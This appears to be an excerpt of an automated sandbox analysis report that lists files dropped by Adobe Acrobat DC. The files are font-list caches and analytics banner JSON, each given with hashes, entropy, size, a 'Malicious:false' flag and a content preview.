                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):1233
                                                                  Entropy (8bit):5.233980037532449
                                                                  Encrypted:false
                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):10880
                                                                  Entropy (8bit):5.214360287289079
                                                                  Encrypted:false
                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7524

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):10880
                                                                  Entropy (8bit):5.214360287289079
                                                                  Encrypted:false
                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.3567434671151055
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJM3g98kUwPeUkwRe9:YvXKXmapj2Zc0vYGMbLUkee9
                                                                  MD5:B9BBD79E108A3EDE650B19B9A53EED3C
                                                                  SHA1:6D02D3C1C712BDD96AFFAED608B2F777A9F20ACD
                                                                  SHA-256:8DBC5832E911452B4A83265778E8E743FE8F85DB04B86B0D58827B4E062D4DA8
                                                                  SHA-512:D17DF32178F5350689A2D8E191A2740850C974CBFCD6A180FE94B132BB2ACEB3F2A7FE189CD75052BBD9AE06B115E05928B4017DB5600F334DBEC97E862B1179
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.30509961962038
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfBoTfXpnrPeUkwRe9:YvXKXmapj2Zc0vYGWTfXcUkee9
                                                                  MD5:9BDBCD33908F199CD1DCEB78730013ED
                                                                  SHA1:F253C162B0FDE40DF0E47F489A8987F8A2352119
                                                                  SHA-256:CFE9A6A32A879CA973C3B43C6C780C1161DF89FCDDD577473A3FD402DC47E8AD
                                                                  SHA-512:D0C1657D9CAD87AEDC07C3144114C5E3AF5752F0610727947EB6DDDFE8BF64E4272831F82757CB7C63F422B977A19A01312503B35D510517E00B602075D22FFE
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.28294971319745
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfBD2G6UpnrPeUkwRe9:YvXKXmapj2Zc0vYGR22cUkee9
                                                                  MD5:4AA37A72F022B460CBA2D73CD3CE05F0
                                                                  SHA1:3FE13212728343855B58242A0CA02C1B9D257E62
                                                                  SHA-256:B0A0D4A078AC2D42340E2740A5E2A085BCC0C6B586C27F6F8BA28705300AEB89
                                                                  SHA-512:83DA606F681363FD83A0F46024E2093273FD55A46E002057BADEC6AAEB9FED7E27C44D502E83700282117C8BB3D717DF7026A7F35A27F873ACC74AC81BD01BFC
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):285
                                                                  Entropy (8bit):5.343521695443525
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfPmwrPeUkwRe9:YvXKXmapj2Zc0vYGH56Ukee9
                                                                  MD5:1B980A67BE66004C7851CD8BCD36B6E8
                                                                  SHA1:37D352127CD486DC9283C914D8E4762769E44F33
                                                                  SHA-256:09D30BF564A190E5817FCC9FAC14622D755A076CE80506E16CED8FEB77FA0648
                                                                  SHA-512:958AC8A5E7A0D6BE20745DD92EEB6626245DD79E1604856FD1AC47CF48257726FB2C7426EE52B44C34EFC56D371B0CF1DBAA9DC60FA993CB0E7DE4AA09D8757D
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1123
                                                                  Entropy (8bit):5.686962782900186
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X2zv1pLgE9cQx8LennAvzBvkn0RCmK8czOCCSr:Yv1thgy6SAFv5Ah8cv/r
                                                                  MD5:43AA1239E1BCDF60D1C7B5541D895E52
                                                                  SHA1:F6F544B2CFCB033BD1AED8AC6D0C9FB6C1E4E3F2
                                                                  SHA-256:76542A9D5A402E182E30B07CEF614D84593055762A428D1BB225B17F0240991F
                                                                  SHA-512:BC5CEE918B4CF1956AAEC48DBAA7F9A02ECBE9A011585EFB8F26EE737FDDC6CDAB3F240777270D1A30CB77F89CAFB75C0A7E0D9060A7361CD15287802935D47D
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.2905669118716245
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJf8dPeUkwRe9:YvXKXmapj2Zc0vYGU8Ukee9
                                                                  MD5:BBDD1617F3D0360A2B3AFF15D5A14CDB
                                                                  SHA1:2FEB94BF407831084A24EBADA136CFE01105E6F6
                                                                  SHA-256:05213026ADB7641D6091C16CE18F4555292683DEDFB47EACD78B6AB4BDEA6CFB
                                                                  SHA-512:7219318E7DEDDB795B13DC8E13EE14FDEDF1BDB67AAAB1A87FAC3366CBFFA7E00AE55EEA2BF479C83506AA83B0D6E1EF57BD81A262577695CFE0B8E37186548A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.2951460615757036
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfQ1rPeUkwRe9:YvXKXmapj2Zc0vYGY16Ukee9
                                                                  MD5:39A77B64C87F0280369EFD18935BB268
                                                                  SHA1:B748C8CBE1E1CC68AA3ACC9CD1B46CEE86B0E350
                                                                  SHA-256:7AEFFBF1DB0535323C0D5305A1D57F4A7BCEA0B4FDB0AB7C80FDAD318088EB90
                                                                  SHA-512:6E9293A9454A91A2EDED9121991F79B71D5B2903D3F21421B6906E3664150140BE6A39B80850BB18D9E6C6BD527AB2A5888E64C83F35BF324DF6E77B57D53447
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.301329613240316
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfFldPeUkwRe9:YvXKXmapj2Zc0vYGz8Ukee9
                                                                  MD5:BE20D9BB711CB0B8B694F36209C1E05E
                                                                  SHA1:987A4A71C31757B5E58C25FA7895C0E3B73C9AFF
                                                                  SHA-256:E6A0B8A9F66283464776D0A748B9DAE2D5F93B56A4E2A38932DB414A4618BDD8
                                                                  SHA-512:B11D875EB1D194E59B72D31465D5152EF2C971289B23D6624BD71C0EE1C9270344109D41EE682A88278F165DC695889AB77C525B50221647234380128B6C4B30
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.316739125876475
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfzdPeUkwRe9:YvXKXmapj2Zc0vYGb8Ukee9
                                                                  MD5:172CB7C20E31324DC248C319CE4997DD
                                                                  SHA1:8DE07EFEBAED089C916FEF88C75BF4CC4869DF87
                                                                  SHA-256:405EAD1E95C645272CF4E29B04BCD2A733A7869DB19B041B73B2205B1A530808
                                                                  SHA-512:986A8B16C916D8716907D8E903E49668F820A4293C373705AEB032765575834BDCA15ED4E80013AD5756AA5C1764E6FF2D5D98A1E0FE3215EF3EEB83B07DA9C3
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.297605858388944
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfYdPeUkwRe9:YvXKXmapj2Zc0vYGg8Ukee9
                                                                  MD5:C00348D0FFF366DBBD3C3DC1D25C4F27
                                                                  SHA1:D9B38D3505E70F643AEAEC2034772700888BA85D
                                                                  SHA-256:E4D3ED1653CAE57C19E20EBA36988836AEA7FBE06B3FF2E9456A00133301B8FE
                                                                  SHA-512:69616DF1E39684A74E0A6BE2EF0A575D778FB7B7835023B5631DCDBB4585A3E1E8D14BAEB68DC4C80C99A86BC34D78C908C179300D45BD66F62719F84CFE6533
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):5.283614080831342
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJf+dPeUkwRe9:YvXKXmapj2Zc0vYG28Ukee9
                                                                  MD5:603A1EC52A772EB10726D98DCB506BAE
                                                                  SHA1:3304807BD29E60A5B6D6DC8D3393BBE6836E4F41
                                                                  SHA-256:26B218C032B608BDCE8687596B75723AE0D0891BD847BB202A65ABD29DD93B36
                                                                  SHA-512:C756D6C915BF5CAB082AE9F82AF0C58F9FC65FCBC2873D6B34B9F069551AE1314E55D512A3F5D37958B35E22A2F81AE1D68F4C97906A3E335FBD2763FCD24E22
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.281169410644327
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfbPtdPeUkwRe9:YvXKXmapj2Zc0vYGDV8Ukee9
                                                                  MD5:242E630D5B6645F683C1BB3FEDF7C5BA
                                                                  SHA1:73A99881899ABA3A8587CB68B733974F203FA4C5
                                                                  SHA-256:481A2C5786A74FB51348EA6FE78E4E7502C22FDC2E5BA27EE30B164A151B4113
                                                                  SHA-512:2E609570C9DB56BD230F1C9E1518CEDA4DB2607BD86B3F575274A61BF096062CA7ECB3D33A35AA487789023BD2863EDE681E68D29E49A0FC09A3CEF43DD642A9
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):287
                                                                  Entropy (8bit):5.2860835903723
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJf21rPeUkwRe9:YvXKXmapj2Zc0vYG+16Ukee9
                                                                  MD5:B23AD72F9F5C94299E00D200D46ECA9C
                                                                  SHA1:A214D1D89D052BF1B86455069620E0D413F22E75
                                                                  SHA-256:77D35C9C354FBD18D2D6E410BB79EDE8BCE3B38615688F22682B861FBCD3BD2D
                                                                  SHA-512:17BBEB9767682F2AE71203B103C0A2EE4711DDBBE25BF9B0BF0C519CEBEDBA5D7ABD9A3A4EBC44753CF85B37867405D5A89D0ABEF337C887A3150A5B6C64A65A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1090
                                                                  Entropy (8bit):5.663658096257025
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X2zvtamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSr:Yv1JBgkDMUJUAh8cvMr
                                                                  MD5:4A672D441DB4D967BA257668C04DA538
                                                                  SHA1:EE0ADED1D2B3A77D1DE02DC7DED303AD36097E52
                                                                  SHA-256:0DB63E2BDEB066574A0DBD8ACDFF20DAF3E50595CE55E2C02386C77324EA7087
                                                                  SHA-512:7CE0C1B05FE318C1E26D9792C0661658A2F9F06A8C87A38D1FF28539CD093292BF07C934BC59EC2F05B745CA46C0C604CB0392CA8CBDD859E9C4FD44EEF0EE78
                                                                  Malicious:false
